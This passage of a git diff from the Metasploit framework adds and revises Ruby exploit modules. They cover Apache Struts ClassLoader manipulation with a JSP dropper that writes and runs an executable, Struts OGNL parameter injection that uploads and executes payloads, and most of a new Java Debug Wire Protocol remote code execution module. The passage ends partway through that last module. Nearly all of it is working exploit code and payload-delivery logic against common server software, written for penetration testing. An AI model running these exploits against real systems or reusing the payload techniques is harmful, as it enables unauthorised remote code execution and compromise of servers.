+        ],
+      'Platform'       => %w{ linux win },
+      'Payload'        =>
+        {
+          'Space' => 5000,
+          'DisableNops' => true
+        },
+      'Targets'        =>
+        [
+          ['Java',
+           {
+               'Arch'     => ARCH_JAVA,
+               'Platform' => %w{ linux win }
+           },
+          ],
+          ['Linux',
+           {
+               'Arch'     => ARCH_X86,
+               'Platform' => 'linux'
+           }
+          ],
+          ['Windows',
+            {
+              'Arch'     => ARCH_X86,
+              'Platform' => 'win'
+            }
+          ]
+        ],
+      'DisclosureDate' => 'Mar 06 2014',
+      'DefaultTarget'  => 1))
+
+      register_options(
+        [
+          Opt::RPORT(8080),
+          OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"])
+        ], self.class)
+  end
+
+  def jsp_dropper(file, exe)
+    dropper = <<-eos
+<%@ page import=\"java.io.FileOutputStream\" %>
+<%@ page import=\"sun.misc.BASE64Decoder\" %>
+<%@ page import=\"java.io.File\" %>
+<% FileOutputStream oFile = new FileOutputStream(\"#{file}\", false); %>
+<% oFile.write(new sun.misc.BASE64Decoder().decodeBuffer(\"#{Rex::Text.encode_base64(exe)}\")); %>
+<% oFile.flush(); %>
+<% oFile.close(); %>
+<% File f = new File(\"#{file}\"); %>
+<% f.setExecutable(true); %>
+<% Runtime.getRuntime().exec(\"./#{file}\"); %>
+    eos
+
+    dropper
+  end
+
+  def dump_line(uri, cmd = "")
+    res = send_request_cgi({
+      'uri'     => uri+cmd,
+      'version' => '1.1',
+      'method'  => 'GET',
+    })
+
+    res
+  end
+
+  def modify_class_loader(opts)
+    res = send_request_cgi({
+      'uri'     => normalize_uri(target_uri.path.to_s),
+      'version' => '1.1',
+      'method'  => 'GET',
+      'vars_get' => {
+        "class['classLoader'].resources.context.parent.pipeline.first.directory"      => opts[:directory],
+        "class['classLoader'].resources.context.parent.pipeline.first.prefix"         => opts[:prefix],
+        "class['classLoader'].resources.context.parent.pipeline.first.suffix"         => opts[:suffix],
+        "class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]
+      }
+    })
+
+    res
+  end
+
+  def check_log_file(hint)
+    uri = normalize_uri("/", @jsp_file)
+
+    print_status("#{peer} - Waiting for the server to flush the logfile")
+
+    10.times do |x|
+      select(nil, nil, nil, 2)
+
+      # Now make a request to trigger payload
+      vprint_status("#{peer} - Countdown #{10-x}...")
+      res = dump_line(uri)
+
+      # Failure. The request timed out or the server went away.
+      fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") if res.nil?
+
+      # Success if the server has flushed all the sent commands to the jsp file
+      if res.code == 200 && res.body && res.body.to_s =~ /#{hint}/
+        print_good("#{peer} - Log file flushed at http://#{peer}/#{@jsp_file}")
+        return true
+      end
+    end
+
+    false
+  end
+
+  # Fix the JSP payload to make it valid once is dropped
+  # to the log file
+  def fix(jsp)
+    output = ""
+    jsp.each_line do |l|
+      if l =~ /<%.*%>/
+        output << l
+      elsif l =~ /<%/
+        next
+      elsif l.chomp.empty?
+        next
+      else
+        output << "<% #{l.chomp} %>"
+      end
+    end
+    output
+  end
+
+  def create_jsp
+    if target['Arch'] == ARCH_JAVA
+      jsp = fix(payload.encoded)
+    else
+      payload_exe = generate_payload_exe
+      payload_file = rand_text_alphanumeric(4 + rand(4))
+      jsp = jsp_dropper(payload_file, payload_exe)
+      register_files_for_cleanup(payload_file)
+    end
+
+    jsp
+  end
+
+  def exploit
+    prefix_jsp = rand_text_alphanumeric(3+rand(3))
+    date_format = rand_text_numeric(1+rand(4))
+    @jsp_file = prefix_jsp + date_format + ".jsp"
+
+    # Modify the Class Loader
+
+    print_status("#{peer} - Modifying Class Loader...")
+    properties = {
+      :directory      => 'webapps/ROOT',
+      :prefix         => prefix_jsp,
+      :suffix         => '.jsp',
+      :file_date_format => date_format
+    }
+    res = modify_class_loader(properties)
+    unless res
+      fail_with(Failure::TimeoutExpired, "#{peer} - No answer")
+    end
+
+    # Check if the log file exists and has been flushed
+
+    if check_log_file(normalize_uri(target_uri.to_s))
+      register_files_for_cleanup(@jsp_file)
+    else
+      fail_with(Failure::Unknown, "#{peer} - The log file hasn't been flushed")
+    end
+
+    # Prepare the JSP
+    print_status("#{peer} - Generating JSP...")
+    jsp = create_jsp
+
+    # Dump the JSP to the log file
+    print_status("#{peer} - Dumping JSP into the logfile...")
+    random_request = rand_text_alphanumeric(3 + rand(3))
+    jsp.each_line do |l|
+      unless dump_line(random_request, l.chomp)
+        fail_with(Failure::Unknown, "#{peer} - Missed answer while dumping JSP to logfile...")
+      end
+    end
+
+    # Check log file... enjoy shell!
+    check_log_file(random_request)
+
+    # No matter what happened, try to 'restore' the Class Loader
+    properties = {
+        :directory      => '',
+        :prefix         => '',
+        :suffix         => '',
+        :file_date_format => ''
+    }
+    modify_class_loader(properties)
+  end
+
+end
+
diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
index 220700c01f..e2e19a1a3c 100644
--- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
+++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
@@ -8,7 +8,7 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::CmdStagerTFTP
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
@@ -45,7 +45,8 @@ class Metasploit3 < Msf::Exploit::Remote
           ['Windows Universal',
             {
                 'Arch' => ARCH_X86,
-                'Platform' => 'win'
+                'Platform' => 'win',
+                'CmdStagerFlavor' => 'tftp'
             }
           ],
           ['Linux Universal',
@@ -94,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
     exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
 
     print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    execute_cmdstager({ :temp => '.'})
+    execute_cmdstager({ :temp => '.' })
     @payload_exe = payload_exe
 
     print_status("Attempting to execute the payload...")
diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb
index 1db90c817f..03add8c9be 100644
--- a/modules/exploits/multi/http/struts_code_exec_parameters.rb
+++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb
@@ -27,7 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           'Meder Kydyraliev', # Vulnerability Discovery and PoC
           'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module
-          'mihi' #ARCH_JAVA support
+          'mihi', #ARCH_JAVA support
+          'Christian Mehlmauer' # Metasploit Module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -44,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
           ['Windows Universal',
             {
               'Arch' => ARCH_X86,
-              'Platform' => 'windows'
+              'Platform' => 'win'
             }
           ],
           ['Linux Universal',
@@ -66,75 +67,109 @@ class Metasploit3 < Msf::Exploit::Remote
       register_options(
         [
           Opt::RPORT(8080),
-          OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]),
-          OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/blank-struts2/login.action?INJECT"]),
-          OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
+          OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.','username']),
+          OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']),
+          OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]),
+          OptString.new('GET_PARAMETERS', [ false, 'Additional GET Parameters to send. Please supply in the format "param1=a&param2=b". Do apply URL encoding to the parameters names and values if needed.', nil]),
+          OptString.new('TMP_PATH', [ false, 'Overwrite the temp path for the file upload. Sometimes needed if the home directory is not writeable. Ensure there is a trailing slash!', nil])
     ], self.class)
   end
 
-  def execute_command(cmd, opts = {})
-    inject = "PARAMETERTOKEN=(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=+new+java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
-    inject << "=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true"
-    inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER']))
-    inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd))
-    uri = String.new(datastore['TARGETURI'])
-    uri = normalize_uri(uri)
-    uri.gsub!(/INJECT/,inject) # append the injection string
+  def parameter
+    datastore['PARAMETER']
+  end
+
+  def temp_path
+    return nil unless datastore['TMP_PATH']
+    unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\')
+      fail_with(Failure::BadConfig, 'You need to add a trailing slash/backslash to TMP_PATH')
+    end
+    datastore['TMP_PATH']
+  end
+
+  def get_parameter
+    retval = {}
+    return retval unless datastore['GET_PARAMETERS']
+    splitted = datastore['GET_PARAMETERS'].split('&')
+    return retval if splitted.nil? || splitted.empty?
+    splitted.each { |item|
+      name, value = item.split('=')
+      # no check here, value can be nil if parameter is &param
+      decoded_name = name ? Rex::Text::uri_decode(name) : nil
+      decoded_value = value ? Rex::Text::uri_decode(value) : nil
+      retval[decoded_name] = decoded_value
+    }
+    retval
+  end
+
+  def execute_command(cmd)
+    junk = Rex::Text.rand_text_alpha(6)
+    inject = "(#context[\"xwork.MethodAccessor.denyMethodExecution\"]= new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
+    inject << "= new java.lang.Boolean(true),#{cmd})('#{junk}')"
+    uri = normalize_uri(datastore['TARGETURI'])
     resp = send_request_cgi({
       'uri'     => uri,
       'version' => '1.1',
       'method'  => 'GET',
+      'vars_get' => { parameter => inject, "z[(#{parameter})(#{junk})]" => 'true' }.merge(get_parameter)
     })
-    return resp #Used for check function.
+    resp
   end
 
   def exploit
     #Set up generic values.
-    @payload_exe = rand_text_alphanumeric(4+rand(4))
+    payload_exe = rand_text_alphanumeric(4 + rand(4))
     pl_exe = generate_payload_exe
-    append = 'false'
+    if pl_exe.nil?
+      fail_with(Failure::BadConfig, "#{peer} - Failed to generate an EXE payload, please select a correct payload")
+    end
+    append = false
     #Now arch specific...
     case target['Platform']
     when 'linux'
-      @payload_exe = "/tmp/#{@payload_exe}"
-      chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))"
-      exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))"
+      path = temp_path || '/tmp/'
+      payload_exe = "#{path}#{payload_exe}"
+      chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{payload_exe}\".split(\"_\"))"
+      exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{payload_exe}\".split(\"_\"))"
     when 'java'
-      @payload_exe << ".jar"
+      payload_exe = "#{temp_path}#{payload_exe}.jar"
       pl_exe = payload.encoded_jar.pack
-      exec_cmd = ""
+      exec_cmd = ''
       exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
       exec_cmd << "#q.setAccessible(true),#q.set(null,true),"
       exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
       exec_cmd << "#q.setAccessible(true),#q.set(null,false),"
-      exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),"
+      exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{payload_exe}').toURI().toURL()}),"
       exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"
       exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
       exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
-    when 'windows'
-      @payload_exe = "./#{@payload_exe}.exe"
-      exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')"
+    when 'win'
+      path = temp_path || './'
+      payload_exe = "#{path}#{payload_exe}.exe"
+      exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{payload_exe}')"
     else
       fail_with(Failure::NoTarget, 'Unsupported target platform!')
     end
 
+    print_status("#{peer} - Uploading exploit to #{payload_exe}")
     #Now with all the arch specific stuff set, perform the upload.
     #109 = length of command string plus the max length of append.
-    sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length
+    sub_from_chunk = 109 + payload_exe.length + datastore['TARGETURI'].length + parameter.length
     chunk_length = 2048 - sub_from_chunk
-    chunk_length = ((chunk_length/4).floor)*3
+    chunk_length = ((chunk_length/4).floor) * 3
     while pl_exe.length > chunk_length
-      java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)
+      java_upload_part(pl_exe[0,chunk_length], payload_exe, append)
       pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]
       append = true
     end
-    java_upload_part(pl_exe,@payload_exe,append)
+    java_upload_part(pl_exe, payload_exe, append)
+    print_status("#{peer} - Executing payload")
     execute_command(chmod_cmd) if target['Platform'] == 'linux'
     execute_command(exec_cmd)
-    register_files_for_cleanup(@payload_exe)
+    register_files_for_cleanup(payload_exe)
   end
 
-  def java_upload_part(part, filename, append = 'false')
+  def java_upload_part(part, filename, append = false)
     cmd = ""
     cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append}),"
     cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
@@ -151,7 +186,6 @@ class Metasploit3 < Msf::Exploit::Remote
     t2 = Time.now
     delta = t2 - t1
 
-
     if response.nil?
       return Exploit::CheckCode::Safe
     elsif delta < sleep_time
diff --git a/modules/exploits/multi/http/struts_include_params.rb b/modules/exploits/multi/http/struts_include_params.rb
index a2999d8026..ae8b8621de 100644
--- a/modules/exploits/multi/http/struts_include_params.rb
+++ b/modules/exploits/multi/http/struts_include_params.rb
@@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
       exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"
       exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
       exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
-    when 'windows'
+    when 'win'
       @payload_exe = "./#{@payload_exe}.exe"
       exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')"
     else
diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb
index 20d4a365d3..e6068cdaba 100644
--- a/modules/exploits/multi/http/wikka_spam_exec.rb
+++ b/modules/exploits/multi/http/wikka_spam_exec.rb
@@ -90,8 +90,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # Get the cookie in this format:
     # 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka
-    if res and res.headers['Set-Cookie']
-      cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
+    if res and !res.get_cookies.empty?
+      cookie = res.get_cookies
     else
       fail_with(Failure::Unknown, "#{peer} - No cookie found, will not continue")
     end
@@ -141,9 +141,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'vars_post' => login
     })
 
-    if res and res.headers['Set-Cookie'] =~ /user_name/
-      user = res.headers['Set-Cookie'].scan(/(user_name\@\w+=\w+);/)[0] || ""
-      pass = res.headers['Set-Cookie'].scan(/(pass\@\w+=\w+)/)[0] || ""
+    if res and res.get_cookies =~ /user_name/
+      c = res.get_cookies
+      user = c.scan(/(user_name\@\w+=\w+);/)[0] || ""
+      pass = c.scan(/(pass\@\w+=\w+)/)[0] || ""
       cookie_cred = "#{cookie}; #{user}; #{pass}"
     else
       cred = "#{datastore['USERNAME']}:#{datastore['PASSWORD']}"
diff --git a/modules/exploits/multi/http/zabbix_script_exec.rb b/modules/exploits/multi/http/zabbix_script_exec.rb
index 57ec58c718..47409ba37f 100644
--- a/modules/exploits/multi/http/zabbix_script_exec.rb
+++ b/modules/exploits/multi/http/zabbix_script_exec.rb
@@ -88,7 +88,7 @@ class Metasploit4 < Msf::Exploit::Remote
       fail_with("Login failed")
     end
 
-    sess = login.headers['Set-Cookie']
+    sess = login.get_cookies
 
     dash = send_request_cgi({
       'method' => 'GET',
diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb
new file mode 100644
index 0000000000..990e67db17
--- /dev/null
+++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb
@@ -0,0 +1,960 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  HANDSHAKE                 = "JDWP-Handshake"
+
+  REQUEST_PACKET_TYPE       = 0x00
+  REPLY_PACKET_TYPE         = 0x80
+
+  # Command signatures
+  VERSION_SIG               = [1, 1]
+  CLASSESBYSIGNATURE_SIG    = [1, 2]
+  ALLCLASSES_SIG            = [1, 3]
+  ALLTHREADS_SIG            = [1, 4]
+  IDSIZES_SIG               = [1, 7]
+  CREATESTRING_SIG          = [1, 11]
+  SUSPENDVM_SIG             = [1, 8]
+  RESUMEVM_SIG              = [1, 9]
+  SIGNATURE_SIG             = [2, 1]
+  FIELDS_SIG                = [2, 4]
+  METHODS_SIG               = [2, 5]
+  GETVALUES_SIG             = [2, 6]
+  CLASSOBJECT_SIG           = [2, 11]
+  SETSTATICVALUES_SIG       = [3, 2]
+  INVOKESTATICMETHOD_SIG    = [3, 3]
+  CREATENEWINSTANCE_SIG     = [3, 4]
+  REFERENCETYPE_SIG         = [9, 1]
+  INVOKEMETHOD_SIG          = [9, 6]
+  STRINGVALUE_SIG           = [10, 1]
+  THREADNAME_SIG            = [11, 1]
+  THREADSUSPEND_SIG         = [11, 2]
+  THREADRESUME_SIG          = [11, 3]
+  THREADSTATUS_SIG          = [11, 4]
+  EVENTSET_SIG              = [15, 1]
+  EVENTCLEAR_SIG            = [15, 2]
+  EVENTCLEARALL_SIG         = [15, 3]
+
+  # Other codes
+  MODKIND_COUNT             = 1
+  MODKIND_THREADONLY        = 2
+  MODKIND_CLASSMATCH        = 5
+  MODKIND_LOCATIONONLY      = 7
+  MODKIND_STEP              = 10
+  EVENT_BREAKPOINT          = 2
+  EVENT_STEP                = 1
+  SUSPEND_EVENTTHREAD       = 1
+  SUSPEND_ALL               = 2
+  NOT_IMPLEMENTED           = 99
+  VM_DEAD                   = 112
+  INVOKE_SINGLE_THREADED    = 2
+  TAG_OBJECT                = 76
+  TAG_STRING                = 115
+  TYPE_CLASS                = 1
+  TAG_ARRAY                 = 91
+  TAG_VOID                  = 86
+  TAG_THREAD                = 116
+  STEP_INTO                 = 0
+  STEP_MIN                  = 0
+  THREAD_SLEEPING_STATUS     = 2
+
+  def initialize
+    super(
+      'Name'           => 'Java Debug Wire Protocol Remote Code Execution',
+      'Description'    => %q{
+        This module abuses exposed Java Debug Wire Protocol services in order
+        to execute arbitrary Java code remotely. It just abuses the protocol
+        features, since no authentication is required if the service is enabled.
+      },
+      'Author'         => [
+        'Michael Schierl', # Vulnerability discovery / First exploit seen / Msf module help
+        'Christophe Alladoum', # JDWP Analysis and Exploit
+        'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module
+      ],
+      'References'     =>
+        [
+          ['OSVDB', '96066'],
+          ['EDB', '27179'],
+          ['URL', 'http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html'],
+          ['URL', 'http://seclists.org/nmap-dev/2010/q1/867'],
+          ['URL', 'https://github.com/schierlm/JavaPayload/blob/master/JavaPayload/src/javapayload/builder/JDWPInjector.java'],
+          ['URL', 'https://svn.nmap.org/nmap/scripts/jdwp-exec.nse'],
+          ['URL', 'http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html']
+        ],
+      'Platform'       => %w{ linux win },
+      'Arch'           => ARCH_X86,
+      'Payload'        =>
+        {
+          'Space'        => 2048,
+          'BadChars'    => '',
+          'DisableNops' => true
+        },
+      'Targets'        =>
+        [
+          [ 'Linux x86 (Native Payload)',
+            {
+                'Platform' => 'linux'
+            }
+          ],
+          [ 'Windows x86 (Native Payload)',
+            {
+              'Platform' => 'win'
+            }
+          ]
+        ],
+      'DefaultTarget'  => 0,
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => 'Mar 12 2010'
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8000),
+        OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]),
+        OptString.new('TMP_PATH', [ false, 'A directory where we can write files. Ensure there is a trailing slash']),
+      ], self.class)
+
+    register_advanced_options(
+      [
+        OptInt.new('NUM_RETRIES', [true, 'Number of retries when waiting for event', 10]),
+      ], self.class)
+  end
+
+  def check
+    connect
+    res = handshake
+    disconnect
+
+    if res.nil?
+      return Exploit::CheckCode::Unknown
+    elsif res == HANDSHAKE
+      return Exploit::CheckCode::Appears
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+
+  def peer
+    "#{rhost}:#{rport}"
+  end
+
+  def default_timeout
+    datastore['RESPONSE_TIMEOUT']
+  end
+
+  # Establishes handshake with the server
+  def handshake
+    sock.put(HANDSHAKE)
+    return sock.get(datastore['RESPONSE_TIMEOUT'])
+  end
+
+  # Forges packet for JDWP protocol
+  def create_packet(cmdsig, data="")
+    flags = 0x00
+    cmdset, cmd = cmdsig
+    pktlen = data.length + 11
+    buf = [pktlen, @my_id, flags, cmdset, cmd]
+    pkt = buf.pack("NNCCC")
+    pkt << data
+    @my_id += 2
+    pkt
+  end
+
+  # Reads packet response for JDWP protocol
+  def read_reply(timeout = default_timeout)
+    response = sock.get(timeout)
+    fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless response
+    pktlen, id, flags, errcode = response.unpack('NNCn')
+    response.slice!(0..10)
+    if errcode != 0 && flags == REPLY_PACKET_TYPE
+      fail_with(Failure::Unknown, "#{peer} - Server sent error with code #{errcode}")
+    end
+    response
+  end
+
+  # Returns the characters contained in the string defined in target VM
+  def solve_string(data)
+    sock.put(create_packet(STRINGVALUE_SIG, data))
+    response = read_reply
+    return "" unless response
+    return read_string(response)
+  end
+
+  # Unpacks received string structure from the server response into a normal string
+  def read_string(data)
+    data_len = data.unpack('N')[0]
+    data.slice!(0..3)
+    return data.slice!(0,data_len)
+  end
+
+  # Creates a new string object in the target VM and returns its id
+  def create_string(data)
+    buf = build_string(data)
+    sock.put(create_packet(CREATESTRING_SIG, buf))
+    buf = read_reply
+    return parse_entries(buf, [[@vars['objectid_size'], "obj_id"]], false)
+  end
+
+  # Packs normal string into string structure for target VM
+  def build_string(data)
+    ret = [data.length].pack('N')
+    ret << data
+
+    ret
+  end
+
+  # Pack Fixnum for JDWP protocol
+  def format(fmt, value)
+    if fmt == "L" || fmt == 8
+      return [value].pack('Q>')
+    elsif fmt == "I" || fmt == 4
+      return [value].pack('N')
+    end
+
+    fail_with(Failure::Unknown, "Unknown format")
+  end
+
+  # Unpack Fixnum from JDWP protocol
+  def unformat(fmt, value)
+    if fmt == "L" || fmt == 8
+      return value[0..7].unpack('Q>')[0]
+    elsif fmt == "I" || fmt == 4
+      return value[0..3].unpack('N')[0]
+    end
+
+    fail_with(Failure::Unknown, "Unknown format")
+  end
+
+  # Parses given data according to a set of formats
+  def parse_entries(buf, formats, explicit=true)
+    entries = []
+
+    if explicit
+      nb_entries = buf.unpack('N')[0]
+      buf.slice!(0..3)
+    else
+      nb_entries = 1
+    end
+
+    nb_entries.times do |var|
+
+      if var != 0 && var % 1000 == 0
+        vprint_status("#{peer} - Parsed #{var} classes of #{nb_entries}")
+      end
+
+      data = {}
+
+      formats.each do |fmt,name|
+        if fmt == "L" || fmt == 8
+          data[name] = buf.unpack('Q>')[0]
+          buf.slice!(0..7)
+        elsif fmt == "I" || fmt == 4
+          data[name] = buf.unpack('N')[0]
+          buf.slice!(0..3)
+        elsif fmt == "S"
+          data_len = buf.unpack('N')[0]
+          buf.slice!(0..3)
+          data[name] = buf.slice!(0,data_len)
+        elsif fmt == "C"
+          data[name] = buf.unpack('C')[0]
+          buf.slice!(0)
+        elsif fmt == "Z"
+          t = buf.unpack('C')[0]
+          buf.slice!(0)
+          if t == 115
+            data[name] = solve_string(buf.slice!(0..7))
+          elsif t == 73
+            data[name], buf = buf.unpack('NN')
+          end
+        else
+          fail_with(Failure::UnexpectedReply, "Unexpected data when parsing server response")
+        end
+
+      end
+      entries.append(data)
+    end
+
+    entries
+  end
+
+  # Gets the sizes of variably-sized data types in the target VM
+  def get_sizes
+    formats = [
+        ["I", "fieldid_size"],
+        ["I", "methodid_size"],
+        ["I", "objectid_size"],
+        ["I", "referencetypeid_size"],
+        ["I", "frameid_size"]
+    ]
+    sock.put(create_packet(IDSIZES_SIG))
+    response = read_reply
+    entries = parse_entries(response, formats, false)
+    entries.each { |e| @vars.merge!(e) }
+  end
+
+  # Gets the JDWP version implemented by the target VM
+  def get_version
+    formats = [
+        ["S", "descr"],
+        ["I", "jdwp_major"],
+        ["I", "jdwp_minor"],
+        ["S", "vm_version"],
+        ["S", "vm_name"]
+    ]
+    sock.put(create_packet(VERSION_SIG))
+    response = read_reply
+    entries = parse_entries(response, formats, false)
+    entries.each { |e| @vars.merge!(e) }
+  end
+
+  def version
+    "#{@vars["vm_name"]} - #{@vars["vm_version"]}"
+  end
+
+  def is_java_eight
+    version.downcase =~ /1[.]8[.]/
+  end
+
+  # Returns reference for all threads currently running on target VM
+  def get_all_threads
+    sock.put(create_packet(ALLTHREADS_SIG))
+    response = read_reply
+    num_threads = response.unpack('N').first
+    response.slice!(0..3)
+
+    size = @vars["objectid_size"]
+    num_threads.times do
+      t_id = unformat(size, response[0..size-1])
+      @threads[t_id] = nil
+      response.slice!(0..size-1)
+    end
+  end
+
+  # Returns reference types for all classes currently loaded by the target VM
+  def get_all_classes
+    return unless @classes.empty?
+
+    formats = [
+      ["C", "reftype_tag"],
+      [@vars["referencetypeid_size"], "reftype_id"],
+      ["S", "signature"],
+      ["I", "status"]
+    ]
+    sock.put(create_packet(ALLCLASSES_SIG))
+    response = read_reply
+    @classes.append(parse_entries(response, formats))
+  end
+
+  # Checks if specified class is currently loaded by the target VM and returns it
+  def get_class_by_name(name)
+    @classes.each do |entry_array|
+      entry_array.each do |entry|
+        if entry["signature"].downcase == name.downcase
+          return entry
+        end
+      end
+    end
+
+    nil
+  end
+
+  # Returns information for each method in a reference type (ie. object). Inherited methods are not included.
+  # The list of methods will include constructors (identified with the name "<init>")
+  def get_methods(reftype_id)
+    if @methods.has_key?(reftype_id)
+      return @methods[reftype_id]
+    end
+
+    formats = [
+        [@vars["methodid_size"], "method_id"],
+        ["S", "name"],
+        ["S", "signature"],
+        ["I", "mod_bits"]
+    ]
+    ref_id = format(@vars["referencetypeid_size"],reftype_id)
+    sock.put(create_packet(METHODS_SIG, ref_id))
+    response = read_reply
+    @methods[reftype_id] = parse_entries(response, formats)
+  end
+
+  # Returns information for each field in a reference type (ie. object)
+  def get_fields(reftype_id)
+    formats = [
+            [@vars["fieldid_size"], "field_id"],
+            ["S", "name"],
+            ["S", "signature"],
+            ["I", "mod_bits"]
+    ]
+    ref_id = format(@vars["referencetypeid_size"],reftype_id)
+    sock.put(create_packet(FIELDS_SIG, ref_id))
+    response = read_reply
+    fields = parse_entries(response, formats)
+
+    fields
+  end
+
+  # Returns the value of one static field of the reference type. The field must be member of the reference type
+  # or one of its superclasses, superinterfaces, or implemented interfaces. Access control is not enforced;
+  # for example, the values of private fields can be obtained.
+  def get_value(reftype_id, field_id)
+    data = format(@vars["referencetypeid_size"],reftype_id)
+    data << [1].pack('N')
+    data << format(@vars["fieldid_size"],field_id)
+
+    sock.put(create_packet(GETVALUES_SIG, data))
+    response = read_reply
+    num_values = response.unpack('N')[0]
+
+    unless (num_values == 1) && (response[4].unpack('C')[0] == TAG_OBJECT)
+      fail_with(Failure::Unknown, "Bad response when getting value for field")
+    end
+
+    response.slice!(0..4)
+
+    len = @vars["objectid_size"]
+    value = unformat(len, response)
+
+    value
+  end
+
+  # Sets the value of one static field. Each field must be member of the class type or one of its superclasses,
+  # superinterfaces, or implemented interfaces. Access control is not enforced; for example, the values of
+  # private fields can be set. Final fields cannot be set.For primitive values, the value's type must match
+  # the field's type exactly. For object values, there must exist a widening reference conversion from the
+  # value's type to the field's type and the field's type must be loaded.
+  def set_value(reftype_id, field_id, value)
+    data = format(@vars["referencetypeid_size"],reftype_id)
+    data << [1].pack('N')
+    data << format(@vars["fieldid_size"],field_id)
+    data << format(@vars["objectid_size"],value)
+
+    sock.put(create_packet(SETSTATICVALUES_SIG, data))
+    read_reply
+  end
+
+
+  # Checks if specified method is currently loaded by the target VM and returns it
+  def get_method_by_name(classname, name, signature = nil)
+    @methods[classname].each do |entry|
+        if signature.nil?
+          return entry if entry["name"].downcase == name.downcase
+        else
+          if entry["name"].downcase == name.downcase && entry["signature"].downcase == signature.downcase
+            return entry
+          end
+        end
+    end
+
+    nil
+  end
+
+  # Checks if specified class and method are currently loaded by the target VM and returns them
+  def get_class_and_method(looked_class, looked_method, signature = nil)
+    target_class = get_class_by_name(looked_class)
